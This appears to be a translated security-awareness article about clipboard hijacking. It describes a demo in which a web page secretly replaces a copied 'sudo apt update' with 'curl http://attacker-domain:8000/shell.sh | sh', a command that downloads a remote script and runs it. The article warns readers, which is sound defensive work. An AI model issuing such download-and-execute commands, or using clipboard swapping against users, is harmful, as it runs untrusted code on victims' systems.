Programmers, Sysadmins, security researchers and technology lovers and I often Copy-Paste the configuration and installation commands, the Web sites give quick instructions, instead of having to retype each command. However, this action is warned that it is dangerous and can cause the system to be hacked because when Copy is one command but Paste is another command.
A security expert has performed a simple trick that will make you think twice before copying and pasting any commands from untrusted websites.
Vulnerability from Clipboard – clipboard
Recently, Gabriel Friedlander, founder of the Wizer platform, which specializes in security awareness training, tested a simple but surprising hack that will make you cautious when copying commands from websites.
Copying frequently used commands from a website (ahem, StackOverflow) and pasting them into a command line tool (terminal) like CMD Windows or Terminal Linux is very familiar to novice programmers or lazy people like me.
But Friedlander warns a web page can secretly replace the content of what’s on your Clipboard, and what’s actually copied to your clipboard will be vastly different from what you intended. Copy.
Worse yet, without the necessary checks, programmers may only realize their mistake after pasting the text, by which time it may be too late.
You can try this hack at https://www.wizer-training.com/blog/copy-paste.
Try copying the line on the web page, then paste it in notepad or anywhere.
You will see results that are not
sudo apt update which is
curl http://attacker-domain:8000/shell.sh | sh
Many people think that they are copying a Linux system Update command, seemingly harmless, but actually in the clipboard is storing the command to load shell.sh and execute it after the download is complete.
People pasting text may have the impression that they are copying update the familiar, harmless sudo apt command used to fetch updates on software installed on your system.